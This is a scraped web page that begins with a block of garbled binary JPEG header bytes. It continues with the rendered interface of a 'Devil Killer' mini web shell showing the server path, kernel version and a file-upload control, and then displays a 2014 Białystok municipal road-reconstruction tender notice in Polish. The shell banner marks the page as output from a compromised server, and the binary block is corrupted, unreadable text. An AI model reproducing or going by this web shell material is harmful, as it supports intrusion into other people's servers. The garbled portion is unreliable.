JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140805/169439-N-2014.html

<p class="kh_header"><b>Białystok: Przebudowa ul. Grochowej, ul. Pod Krzywą i ul. K. Pułaskiego w Białymstoku.</b><br>
<b>Numer ogłoszenia: 169439 - 2014; data zamieszczenia: 05.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Białystok , ul. Słonimska 1, 15-950 Białystok, woj. podlaskie, tel. 085 869 60 02, faks 085 869 62 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ul. Grochowej, ul. Pod Krzywą i ul. K. Pułaskiego w Białymstoku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2. Zakres prac obejmuje: 
1) Zadanie  I -  przebudowa  ul. Grochowej w Białymstoku od ul. Lipowej do ul. K. Kalinowskiego  w zakresie nawierzchni jezdni, zjazdów i prawostronnego chodnika dla pieszych:

L.p.	Asortyment robót	 Jednostka	Ilość robót
1	Roboty pomiarowe przy liniowych robotach ziemnych, na drogach w terenie równinnym	km	0,19
2	Rozbiórka mechaniczna podbudowy z kruszywa grubości 15cm wraz z transportem urobku	m2	65
3	Rozebranie mechaniczne nawierzchni z mas mineralno-bitumicznych grubości 5cm wraz z odwiezieniem gruzu z rozbiórki	m2	770
4	Rozebranie mechaniczne nawierzchni z betonu grubości 15cm wraz odwiezieniem gruzu z rozbiórki	m2	22
5	Rozebranie nawierzchni z płyt drogowych betonowych (trylinki) grubości 15cm wraz z odwiezieniem materiałów z rozbiórki	m2	65
6	Rozebranie nawierzchni z betonowej kostki brukowej grubości 8cm wraz z odwiezieniem materiałów z rozbiórki	m2	130
7	Rozebranie nawierzchni chodników z płyt betonowych o wymiarach 35x35x5cm wraz z odwiezieniem materiałów z rozbiórki	m2	130
8	Rozebranie krawężników kamiennych	m	10
9	Rozebranie obrzeży betonowych o wymiarach 6x20cm wraz z odwiezieniem materiałów z rozbiórki	m	280
10	Wykonanie wykopów mechanicznie w gr. kat. I-II z transportem urobku na odkład	m3	111
11	Regulacja pionowa studzienek telekomunikacyjnych	szt.	3
12	Regulacja pionowa włazów kanałowych studni rewizyjnych oraz wpustów ulicznych	szt.	25
13	Regulacja pionowa zaworów wodociągowych i gazowych	szt.	10
14	Wymiana włazów studni kanalizacyjnych - koszt materiału i dostawy 	szt.	6
15	Profilowanie i zagęszczanie mechaniczne podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kategorii II-VI	m2	1272
16	Mechaniczne oczyszczenie nawierzchni nieulepszonej	m2	1272
17	Mechaniczne oczyszczenie nawierzchni bitumicznej	m2	1850
18	Skropienie warstw konstrukcyjnych nawierzchni emulsją asfaltową	m2	3700
19	Podbudowy z kruszyw naturalnych, warstwa górna, grubość warstwy po zagęszczeniu 10cm	m2	1200
20	Podbudowy z kruszyw łamanych, warstwa dolna, grubość warstwy po zagęszczeniu 25cm	m2	72
21	Mechaniczne wyrównanie istniejącej podbudowy betonem asfaltowym	t	101,8
22	Wykonanie nawierzchni z betonu asfaltowego, warstwa ścieralna, grubość w-wy 4 cm	m2	1850
23	Nawierzchnia z kostki brukowej betonowej o grubości 8cm na podsypce cementowo-piaskowej	m2	282
24	Mechaniczne frezowanie istniejącej nawierzchni bitumicznej wraz z odwiezieniem materiałów z rozbiórki, średnia grubość frezowania 5cm	m2	1850
25	Ustawienie krawężników betonowych o wymiarach 15x30 cm na ławie betonowej z oporem	m	40
26	Ustawienie krawężników kamiennych z odzysku na ławie betonowej z oporem	m	10
27	Chodniki z kostki brukowej betonowej grubości 6cm na podsypce cementowo-piaskowej wypełnieniem spoin piaskiem wraz z profilowaniem i zagęszczeniem podłoża	m2	1050
28	Ustawienie obrzeży betonowych o wymiarach 20x6 cm	m	260
29	Wykonanie trawników dywanowych	m2	350

2) Zadanie II  -  przebudowa ulicy Pod Krzywą w Białymstoku w zakresie nawierzchni jezdni                                    i zjazdów:

L.p.	
Asortyment robót	
Jednostka	
Ilość robót
1	Roboty pomiarowe przy liniowych robotach ziemnych, na drogach w terenie równinnym	km	0,78
2	Rozbiórka mechaniczna podbudowy z kruszywa grubości 15cm wraz z transportem urobku	m2	310
3	Rozebranie mechaniczne nawierzchni z mas mineralno-bitumicznych grubości 5cm wraz z odwiezieniem gruzu z rozbiórki	m2	65
4	Rozebranie nawierzchni z betonowej kostki brukowej grubości 8cm wraz z odwiezieniem materiałów z rozbiórki	m2	310
5	Rozebranie nawierzchni z płyt drogowych betonowej o grubości 10cm	m2	15
6	Rozebranie nawierzchni z płyt drogowych betonowej ażurowych wraz z odwiezieniem materiałów z rozbiórki	m2	95
7	Rozebranie nawierzchni chodników z płyt betonowych o wymiarach 50x50x7cm	m2	160
8	Rozebranie krawężników betonowych wraz z odwiezieniem materiałów z rozbiórki	m	316,5
9	Wykonanie wykopów mechanicznie w gr. kat. I-II z transportem urobku na odkład	m3	395
10	Regulacja pionowa włazów kanałowych studni rewizyjnych oraz wpustów ulicznych	szt.	8
11	Regulacja pionowa zaworów wodociągowych i gazowych	szt.	12
12	Wymiana włazów studni kanalizacyjnych - koszt materiału i dostawy 	szt.	2
13	Profilowanie i zagęszczanie mechaniczne podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kategorii II-VI	m2	170
14	Mechaniczne oczyszczenie nawierzchni nieulepszonej	m2	170
15	Mechaniczne oczyszczenie nawierzchni bitumicznej	m2	5005
16	Skropienie warstw konstrukcyjnych nawierzchni emulsją asfaltową	m2	9825
17	Podbudowy z kruszyw łamanych, warstwa górna, grubość warstwy po zagęszczeniu 15cm	m2	170
18	Mechaniczne wyrównanie istniejącej podbudowy betonem asfaltowym	t	352,6
19	Nawierzchnia z płyt drogowych betonowych z odzysku o grubości 10cm	m2	87
20	Wykonanie nawierzchni z betonu asfaltowego, warstwa ścieralna, grubość w-wy 4 cm	m2	5005
21	Nawierzchnia z kostki brukowej betonowej o grubości 8cm na podsypce cementowo-piaskowej	m2	70
22	Nawierzchnia z kostki brukowej betonowej z odzysku o grubości 8cm na podsypce cementowo-piaskowej	m2	240
23	Mechaniczne frezowanie istniejącej nawierzchni bitumicznej wraz z odwiezieniem materiałów z rozbiórki, średnia grubość frezowania 4cm	m2	120
24	Mechaniczne frezowanie istniejącej nawierzchni bitumicznej wraz z odwiezieniem materiałów z rozbiórki, średnia grubość frezowania 5cm	m2	665
25	Progi przejazdowe U-16d	m	16,5
26	Ustawienie krawężników betonowych o wymiarach 20x30 cm na ławie betonowej z oporem	m	337
27	Chodniki z płyt betonowych 35x35x5cm na podsypce piaskowej z wypełnieniem spoin piaskiem wraz z profilowaniem i zagęszczeniem podłoża	m2	10
28	Chodniki z płyt betonowych 50x50x7cm z odzysku na podsypce piaskowej z wypełnieniem spoin piaskiem wraz z profilowaniem i zagęszczeniem podłoża	m2	160
29	Chodniki z kostki brukowej betonowej grubości 6cm na podsypce cementowo-piaskowej wypełnieniem spoin piaskiem wraz z profilowaniem i zagęszczeniem podłoża	m2	120
30	Ustawienie obrzeży betonowych o wymiarach 30x8cm na podsypce piaskowej	m	120
31	Ustawienie obrzeży betonowych o wymiarach 30x8cm z wykonaniem ławy betonowej i na podsypce cementowo-piaskowej	m	52
32	Wykonanie trawników dywanowych	m2	30

3) Zadanie III  - przebudowa ul. K. Pułaskiego od ul. S. Duboisa do ul. I. J. Paderewskiego                                                  w zakresie nawierzchni jezdni, zjazdów i miejsc postojowych dla samochodów osobowych:

L.p.	Asortyment robót	Jednostka	Ilość robót
1	Roboty pomiarowe przy liniowych robotach ziemnych, na drogach w terenie równinnym	km	0,47
2	Rozebranie mechaniczne nawierzchni z betonu grubości 15cm wraz odwiezieniem gruzu z rozbiórki	m2	195
3	Rozebranie nawierzchni z betonowej kostki brukowej grubości 8cm wraz z odwiezieniem materiałów z rozbiórki	m2	18
4	Rozebranie nawierzchni chodników z płyt betonowych o wymiarach 35x35x5cm wraz z odwiezieniem materiałów z rozbiórki	m2	115
5	Rozebranie krawężników betonowych wraz z odwiezieniem materiałów z rozbiórki	m	930
 6	Rozebranie obrzeży betonowych o wymiarach 6x20cm wraz z odwiezieniem materiałów z rozbiórki	m	220
7	Wykonanie wykopów mechanicznie w gr. kat. I-II z transportem urobku na odkład	m3	29,3
8	Regulacja pionowa włazów kanałowych studni rewizyjnych oraz wpustów ulicznych	szt.	47
9	Wymiana włazów studni kanalizacyjnych - koszt materiału i dostawy 	szt.	11
10 	Wzmocnienie izolacji na istniejącym ciepłociągu	m2	50
11	Profilowanie i zagęszczanie mechaniczne podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kategorii II-VI	m2	665
12	Mechaniczne oczyszczenie nawierzchni nieulepszonej	m2	665
13	Mechaniczne oczyszczenie nawierzchni bitumicznej	m2	4140
14	Skropienie warstw konstrukcyjnych nawierzchni emulsją asfaltową	m2	7340
 15	Podbudowy z kruszyw naturalnych, warstwa dolna, grubość warstwy po zagęszczeniu 20cm	m2	470
16	Podbudowy z kruszyw łamanych, warstwa górna, grubość warstwy po zagęszczeniu 15cm	m2	195
17	Mechaniczne wyrównanie istniejącej podbudowy betonem asfaltowym	t	176
18	Wykonanie nawierzchni z betonu asfaltowego, warstwa ścieralna, grubość w-wy 4 cm	m2	4140
19	Nawierzchnia z kostki brukowej betonowej o grubości 8cm na podsypce cementowo-piaskowej	m2	213
20	Mechaniczne frezowanie istniejącej nawierzchni bitumicznej wraz z odwiezieniem materiałów z rozbiórki, średnia grubość frezowania 6cm	m2	3200
21	Mechaniczne frezowanie istniejącej nawierzchni bitumicznej wraz z odwiezieniem materiałów z rozbiórki, średnia grubość frezowania 4cm	m2	940
22	Ustawienie krawężników betonowych o wymiarach 20x30 cm na ławie betonowej z oporem	m	930
23	Chodniki z płyt betonowych 35x35x5cm na podsypce piaskowej z wypełnieniem spoin piaskiem wraz z wykonaniem koryta o głebokości 10cm	m2	115
24	Ustawienie obrzeży betonowych o wymiarach 20x6cm na podsypce piaskowej	m	220

3. Materiały rozbiórkowe są własnością Zamawiającego. Zamawiający wskaże miejsce wywozu materiałów rozbiórkowych w odległości nie większej niż 10km od miejsca robót.
4. Wykonawca zapewnia projekt organizacji ruchu i oznakowanie robót zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 23 września 2003 r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem (Dz.U.Nr.177 z 2003r. poz. 1729).
5. Oznakowanie terenu robót Wykonawca wykona we własnym zakresie, zgodnie z obowiązującymi przepisami Prawo o ruchu drogowym, wymaganiami Instrukcji oznakowania robót prowadzonych   w pasie drogowym, a także z wymogami szczegółowych warunków technicznych dla znaków   i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach.
6. Materiały zastosowane przy realizacji zamówienia winny posiadać deklarację zgodności lub certyfikat zgodności z Polską Normą, bądź aprobatę techniczną. Obowiązkiem tym nie są objęte materiały pochodzące  z rozbiórek (z odzysku), wykorzystane do wykonania prac.
7.Wykonawca zapewni dostęp do zaplecza laboratoryjnego i na żądanie Zamawiającego będzie przedkładał wyniki badań laboratoryjnych (zgodnie z wymaganiami w SST) stanowiących przedmiot zamówienia.   W przypadku, jeżeli w ocenie Zamawiającego, wyniki badań laboratoryjnych nie odpowiadają jakości wbudowanych warstw, Zamawiający zleci wykonanie badań niezależnemu laboratorium. Koszty badań ponosi Zamawiający, jeżeli wyniki badań będą tożsame z wynikami przedstawionymi przez Wykonawcę.  W przeciwnym przypadku koszty zlecenia niezbędnych badań ponosi Wykonawca.
8. W trakcie realizacji zamówienia Zamawiający będzie mógł pobierać z placu budowy próbki materiałów, celem sprawdzenia ich jakości. Koszt badań ponosi Zamawiający, jeżeli wyniki badań będą odpowiadały deklaracji zgodności, certyfikatowi zgodności z Polską Normą, bądź aprobacie technicznej przedstawionej przez Wykonawcę. W przeciwnym przypadku koszt zlecenia niezbędnych badań ponosi Wykonawca.		
9. W przypadku realizacji wszystkich zadań przez jednego Wykonawcę, Zamawiający będzie żądał wystawienia faktur oddzielnie na każde zadanie. 
10. Szczegółowy opis zamówienia w dokumentacji projektowej, specyfikacjach technicznych wykonania i odbioru robót oraz wymaganiach  ogólnych stanowiących  - załącznik  nr  7 do SIWZ.
11.W przypadku, gdy w dokumentacji projektowej zostały wskazane nazwy, znaki towarowe lub typy materiałów czy produktów lub normy, aprobaty, specyfikacje czy systemy, o których mowa w art. 30 ust. 1-3 ustawy, Zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod warunkiem, że zapewnią uzyskanie parametrów technicznych nie gorszych od określonych w dokumentacji.
12.W przypadku oferowania rozwiązań równoważnych w stosunku do rozwiązań określonych w dokumentacji projektowej, Wykonawca zobowiązany jest do wypełnienia wymogu wynikającego z art. 30 ust. 5 ustawy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każda oferta musi być zabezpieczona wadium o wartości 4 500,00 PLN, w tym:
Część I -  przebudowa  ul. Grochowej w Białymstoku od ul. Lipowej do ul. K. Kalinowskiego
               w zakresie nawierzchni jezdni, zjazdów i prawostronnego chodnika dla pieszych:  1 500,00 zł
Część II - przebudowa ulicy Pod Krzywą w Białymstoku w zakresie nawierzchni jezdni
               i zjazdów:  1500,00 zł
Część III - przebudowa ul. K. Pułaskiego od ul. S. Duboisa do ul. I. J. Paderewskiego w zakresie
                nawierzchni jezdni, zjazdów i miejsc postojowych dla samochodów osobowych: 1500,00 zł
2. Wadium może być wniesione w następujących formach:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym że poręczenie kasy  jest zawsze  poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
3.	Wadium wnoszone w formie pieniężnej należy wpłacić PRZELEWEM na rachunek bankowy 
w Banku Pekao S.A. nr 37 1240 5211 1111 0010 3553 7299, a dowód wpłaty wadium należy dołączyć do oferty.
4.	Wadium wnoszone w pozostałych formach można złożyć w kasie Urzędu Miejskiego, 
ul. Słonimska 1, pok. 21 (oryginał), a potwierdzenie wraz z kopią złożonego dokumentu należy załączyć do oferty lub oryginał wadium załączyć do oferty (luzem) kopię wadium wpiąć do oferty.
5.	Wadium wnosi się przed upływem terminu składania ofert. Za skuteczne wniesienie wadium 
w pieniądzu zamawiający uważa wadium, które w tym terminie znajdzie się na koncie Zamawiającego.
6.	Wykonawca, który nie wniósł wadium zostanie wykluczony z postępowania.
7.	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy.
8.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
9.	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 
10.	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium, na podstawie art. 46 ust. 1 ustawy Pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego. 
11.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi 
na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń potwierdzających spełnianie warunków udziału w postępowaniu lub pełnomocnictw, chyba, 
że udowodni, iż wynika to z przyczyn nieleżących po jego stronie. 
12.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy na warunkach określonych w ofercie,
b)	nie wniósł zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku Wykonawca winien wykazać się zrealizowaniem, w okresie ostatnich 5 lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 roboty budowlanej o wartości min. 400 tys. PLN (budowa lub  przebudowa ulicy lub drogi), obejmującej swoim zakresem zarówno roboty bitumiczne oraz  roboty brukarskie - z podaniem   rodzaju i wartości robót, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Wartości pieniężne wskazane w dokumentach, mające na celu wykazanie spełniania przez wykonawców warunków udziału w postępowaniu dotyczących posiadania wiedzy i doświadczenia,  podane w walutach obcych, wykonawca przeliczy na złote polskie wg średniego kursu walut NBP z dnia opublikowania ogłoszenia o niniejszym postępowaniu w  Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia spełnienia warunku wykonawca winien wykazać się dysponowaniem osobami (min 1 osobą), które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi w rozumieniu ustawy z dnia 07.07.1994 r. Prawo budowlane (Dz. U. z 2013 r. poz. 1409) lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów lub uprawnienia równoważne według przepisów kraju ich uzyskania, do sprawowania samodzielnej funkcji technicznej w specjalności: drogowej,  z podaniem informacji na temat ich kwalifikacji zawodowych, niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Za najważniejsze roboty budowlane, których dotyczy obowiązek wskazania w wykazie i złożenia ww. dowodów, uznaje się roboty niezbędne do wykazania spełnienia warunku określonego w rozdz. III.3.2); - Zamawiający nie wymaga wskazania w wykazie informacji o robotach niewykonanych lub wykonanych nienależycie oraz wskazania z nim wszystkich wykonanych robót;;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
